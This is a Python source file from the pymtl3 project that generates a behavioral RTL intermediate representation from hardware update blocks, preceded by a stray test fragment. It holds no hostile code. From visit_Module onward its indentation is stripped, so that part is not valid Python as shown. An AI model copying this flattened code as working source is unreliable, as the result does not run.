            self.fail('Should throw already exists error')
        except AlreadyExistsError as error:
            # Fixed: `print error` is Python 2-only syntax and is a
            # SyntaxError under Python 3; the call form works on both.
            print(error)
|
<reponame>hsqforfun/pymtl3
#=========================================================================
# BehavioralRTLIRGenL1Pass.py
#=========================================================================
# Author : <NAME>
# Date : Oct 20, 2018
"""Provide L1 behavioral RTLIR generation pass."""
import ast
import copy
import pymtl3.dsl as dsl
from pymtl3.datatypes import Bits, concat, reduce_and, reduce_or, reduce_xor, sext, zext
from pymtl3.passes.BasePass import BasePass, PassMetadata
from pymtl3.passes.rtlir.errors import PyMTLSyntaxError
from . import BehavioralRTLIR as bir
class BehavioralRTLIRGenL1Pass( BasePass ):
  def __call__( s, m ):
    """Generate RTLIR for all upblks of m."""
    # Lazily create the per-component metadata slot for this pass.
    if not hasattr( m, '_pass_behavioral_rtlir_gen' ):
      m._pass_behavioral_rtlir_gen = PassMetadata()
    m._pass_behavioral_rtlir_gen.rtlir_upblks = {}
    visitor = BehavioralRTLIRGeneratorL1( m )
    # Partition update blocks: update_ff blocks are sequential, the rest
    # are combinational.
    upblks = {
      'CombUpblk' : list(m.get_update_blocks() - m.get_update_ff()),
      'SeqUpblk'  : list(m.get_update_ff())
    }
    # Sort the upblks by their name
    upblks['CombUpblk'].sort( key = lambda x: x.__name__ )
    upblks['SeqUpblk'].sort( key = lambda x: x.__name__ )
    for upblk_type in ( 'CombUpblk', 'SeqUpblk' ):
      for blk in upblks[ upblk_type ]:
        # The visitor reads _upblk_type when constructing the RTLIR root.
        visitor._upblk_type = upblk_type
        upblk_info = m.get_update_block_info( blk )
        # upblk_info fields used below: [0] is_lambda, [1] src, [2] line
        # number, [3] filename, [-1] the parsed AST handed to the visitor.
        upblk = visitor.enter( blk, upblk_info[-1] )
        upblk.is_lambda = upblk_info[0]
        upblk.src      = upblk_info[1]
        upblk.lino     = upblk_info[2]
        upblk.filename = upblk_info[3]
        m._pass_behavioral_rtlir_gen.rtlir_upblks[ blk ] = upblk
class BehavioralRTLIRGeneratorL1( ast.NodeVisitor ):
  def __init__( s, component ):
    # The component whose update blocks are being translated; it is
    # attached to the generated RTLIR root in enter().
    s.component = component
  def enter( s, blk, ast ):
    """Entry point of RTLIR generation.

    `blk` is the update-block function object and `ast` its parsed AST
    (note: this parameter shadows the imported `ast` module within this
    method). Returns the RTLIR tree with `component` attached.
    """
    s.blk = blk
    # s.globals contains a dict of the global namespace of the module where
    # blk was defined
    s.globals = blk.__globals__
    # s.closure contains the free variables defined in an enclosing scope.
    # Basically this is the model instance s.
    s.closure = {}
    for i, var in enumerate( blk.__code__.co_freevars ):
      try:
        s.closure[ var ] = blk.__closure__[ i ].cell_contents
      except ValueError:
        # Unbound (empty) cell -- skip this free variable.
        pass
    ret = s.visit( ast )
    ret.component = s.component
    return ret
  def get_call_obj( s, node ):
    """Resolve the object a Call node's function name refers to.

    Only plain-name calls (e.g. Bits4(2)) are supported. The name is
    looked up first in the block's global namespace, then in its closure.
    Raises PyMTLSyntaxError for star/double-star/keyword arguments, for
    non-name callees, and for names that cannot be resolved.
    """
    # starargs/kwargs only exist on older Python ASTs; reject them if set.
    if hasattr(node, "starargs") and node.starargs:
      raise PyMTLSyntaxError( s.blk, node, 'star argument is not supported!')
    if hasattr(node, "kwargs") and node.kwargs:
      raise PyMTLSyntaxError( s.blk, node,
        'double-star argument is not supported!')
    if node.keywords:
      raise PyMTLSyntaxError( s.blk, node, 'keyword argument is not supported!')
    if not isinstance( node.func, ast.Name ):
      raise PyMTLSyntaxError( s.blk, node,
        f'{node.func} is called but is not a name!')
    func = node.func
    # Find the corresponding object of node.func field
    # TODO: Support Verilog task?
    # if func in s.mapping:
    #   The node.func field corresponds to a member of this class
    #   obj = s.mapping[ func ][ 0 ]
    # else:
    try:
      # An object in global namespace is used
      if func.id in s.globals:
        obj = s.globals[ func.id ]
      # An object in closure is used
      elif func.id in s.closure:
        obj = s.closure[ func.id ]
      else:
        raise NameError
    except NameError:
      raise PyMTLSyntaxError( s.blk, node,
        node.func.id + ' function is not found!' )
    return obj
def visit_Module( s, node ):
if len( node.body ) != 1 or \
not isinstance( node.body[0], ast.FunctionDef ):
raise PyMTLSyntaxError( s.blk, node,
'Update blocks should have exactly one FuncDef!' )
ret = s.visit( node.body[0] )
ret.ast = node
return ret
def visit_FunctionDef( s, node ):
"""Return the behavioral RTLIR of function node.
We do not need to check the decorator list -- the fact that we are
visiting this node ensures this node was added to the upblk
dictionary through s.update() (or other PyMTL decorators) earlier!
"""
# Check the arguments of the function
if node.args.args or node.args.vararg or node.args.kwarg:
raise PyMTLSyntaxError( s.blk, node,
'Update blocks should not have arguments!' )
# Save the name of the upblk
s._upblk_name = node.name
# Get the type of upblk from ._upblk_type variable
ret = eval( 'bir.' + s._upblk_type + '( node.name, [] )' )
for stmt in node.body:
ret.body.append( s.visit( stmt ) )
ret.ast = node
return ret
def visit_Assign( s, node ):
if len( node.targets ) != 1:
raise PyMTLSyntaxError( s.blk, node,
'Assigning to multiple targets is not allowed!' )
value = s.visit( node.value )
target = s.visit( node.targets[0] )
ret = bir.Assign( target, value, blocking = True )
ret.ast = node
return ret
def visit_AugAssign( s, node ):
"""Return the behavioral RTLIR of a non-blocking assignment
If the given AugAssign is not non-blocking assignment, throw PyMTLSyntaxError
"""
if isinstance( node.op, ast.LShift ):
value = s.visit( node.value )
target = s.visit( node.target )
ret = bir.Assign( target, value, blocking = False )
ret.ast = node
return ret
raise PyMTLSyntaxError( s.blk, node,
'invalid operation: augmented assignment is not non-blocking assignment!' )
def visit_Call( s, node ):
"""Return the behavioral RTLIR of method calls.
Some data types are interpreted as function calls in the Python AST.
Example: Bits4(2)
These are converted to different RTLIR nodes in different contexts.
"""
obj = s.get_call_obj( node )
if ( obj == copy.copy ) or ( obj == copy.deepcopy ):
if len( node.args ) != 1:
raise PyMTLSyntaxError( s.blk, node,
f'copy method {obj} takes exactly 1 argument!')
ret = s.visit( node.args[0] )
ret.ast = node
return ret
# Now that we have the live Python object, there are a few cases that
# we need to treat separately:
# 1. Instantiation: Bits16( 10 ) where obj is an instance of Bits
# Bits16( 1+2 ), Bits16( s.STATE_A )?
# 2. concat()
# 3. zext(), sext()
# TODO: support the following
# 4. reduce_and(), reduce_or(), reduce_xor()
# 5. Real function call: not supported yet
# Deal with Bits type cast
if isinstance(obj, type) and issubclass( obj, Bits ):
nbits = obj.nbits
if len( node.args ) != 1:
raise PyMTLSyntaxError( s.blk, node,
'exactly one argument should be given to Bits!' )
value = s.visit( node.args[0] )
ret = bir.SizeCast( nbits, value )
ret.ast = node
return ret
# concat method
elif obj is concat:
if len( node.args ) < 1:
raise PyMTLSyntaxError( s.blk, node,
'at least one argument should be given to concat!' )
values = [s.visit(c) for c in node.args]
ret = bir.Concat( values )
ret.ast = node
return ret
# zext method
elif obj is zext:
if len( node.args ) != 2:
raise PyMTLSyntaxError( s.blk, node,
'exactly two arguments should be given to zext!' )
nbits = s.visit( node.args[1] )
value = s.visit( node.args[0] )
ret = bir.ZeroExt( nbits, value )
ret.ast = node
return ret
# sext method
elif obj is sext:
if len( node.args ) != 2:
raise PyMTLSyntaxError( s.blk, node,
'exactly two arguments should be given to sext!' )
nbits = s.visit( node.args[1] )
value = s.visit( node.args[0] )
ret = bir.SignExt( nbits, value )
ret.ast = node
return ret
# reduce methods
elif obj is reduce_and or obj is reduce_or or obj is reduce_xor:
if obj is reduce_and:
op = bir.BitAnd()
elif obj is reduce_or:
op = bir.BitOr()
elif obj is reduce_xor:
op = bir.BitXor()
if len( node.args ) != 1:
raise PyMTLSyntaxError( s.blk, node,
f'exactly two arguments should be given to reduce {op} methods!' )
value = s.visit( node.args[0] )
ret = bir.Reduce( op, value )
ret.ast = node
return ret
else:
# Only Bits class instantiation is supported at L1
raise PyMTLSyntaxError( s.blk, node,
f'Unrecognized method call {obj.__name__}!' )
def visit_Attribute( s, node ):
ret = bir.Attribute( s.visit( node.value ), node.attr )
ret.ast = node
return ret
def visit_Subscript( s, node ):
value = s.visit( node.value )
if isinstance( node.slice, ast.Slice ):
if node.slice.step is not None:
raise PyMTLSyntaxError( s.blk, node,
'Slice with steps is not supported!' )
lower, upper = s.visit( node.slice )
ret = bir.Slice( value, lower, upper )
ret.ast = node
return ret
# signal[ index ]
# index might be a slice object!
if isinstance( node.slice, ast.Index ):
idx = s.visit( node.slice )
# If we have a static slice object then use it
if isinstance( idx, bir.FreeVar ) and isinstance( idx.obj, slice ):
slice_obj = idx.obj
if slice_obj.step is not None:
raise PyMTLSyntaxError( s.blk, node,
'Slice with steps is not supported!' )
assert isinstance( slice_obj.start, int ) and \
isinstance( slice_obj.stop, int ), \
f"start and stop of slice object {slice_obj} must be integers!"
ret = bir.Slice( value,
bir.Number(slice_obj.start), bir.Number(slice_obj.stop) )
# Else this is a real index
else:
ret = bir.Index( value, idx )
ret.ast = node
return ret
raise PyMTLSyntaxError( s.blk, node,
'Illegal subscript ' + node + ' encountered!' )
def visit_Slice( s, node ):
return ( s.visit( node.lower ), s.visit( node.upper ) )
def visit_Index( s, node ):
return s.visit( node.value )
def visit_Name( s, node ):
if node.id in s.closure:
# free var from closure
obj = s.closure[ node.id ]
if isinstance( obj, dsl.Component ):
# Component freevars are an L1 thing.
if obj is not s.component:
raise PyMTLSyntaxError( s.blk, node,
f'Component {obj} is not a sub-component of {s.component}!' )
ret = bir.Base( obj )
else:
ret = bir.FreeVar( node.id, obj )
ret.ast = node
return ret
elif node.id in s.globals:
# free var from the global name space
ret = bir.FreeVar( node.id, s.globals[ node.id ] )
ret.ast = node
return ret
raise PyMTLSyntaxError( s.blk, node,
f'Temporary variable {node.id} is not supported at L1!' )
def visit_Num( s, node ):
ret = bir.Number( node.n )
ret.ast = node
return ret
def visit_If( s, node ): raise NotImplementedError()
def visit_For( s, node ): raise NotImplementedError()
def visit_BoolOp( s, node ): raise NotImplementedError()
def visit_BinOp( s, node ): raise NotImplementedError()
def visit_UnaryOp( s, node ): raise NotImplementedError()
def visit_IfExp( s, node ): raise NotImplementedError()
def visit_Compare( s, node ): raise NotImplementedError()
# $display
def visit_Print( s, node ): raise NotImplementedError()
# function
def visit_Return( s, node ): raise NotImplementedError()
# SV assertion
def visit_Assert( s, node ): raise NotImplementedError()
def visit_Expr( s, node ):
"""Return the behavioral RTLIR of an expression.
ast.Expr might be useful when a statement is only a call to a task or
a non-returning function.
"""
raise PyMTLSyntaxError(
s.blk, node, 'Stand-alone expression is not supported yet!'
)
def visit_Lambda( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: lambda function' )
def visit_Dict( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid type: dict' )
def visit_Set( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid type: set' )
def visit_List( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid type: list' )
def visit_Tuple( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid type: tuple' )
def visit_ListComp( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: list comprehension' )
def visit_SetComp( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: set comprehension' )
def visit_DictComp( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: dict comprehension' )
def visit_GeneratorExp( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: generator expression' )
def visit_Yield( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: yield' )
def visit_Repr( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: repr' )
def visit_Str( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: str' )
def visit_ClassDef( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: classdef' )
def visit_Delete( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: delete' )
def visit_With( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: with' )
def visit_Raise( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: raise' )
def visit_TryExcept( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: try-except' )
def visit_TryFinally( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: try-finally' )
def visit_Import( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: import' )
def visit_ImportFrom( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: import-from' )
def visit_Exec( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: exec' )
def visit_Global( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: global' )
def visit_Pass( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: pass' )
def visit_Break( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: break' )
def visit_Continue( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: continue' )
def visit_While( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: while' )
def visit_ExtSlice( s, node ):
raise PyMTLSyntaxError( s.blk, node, 'invalid operation: extslice' )
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.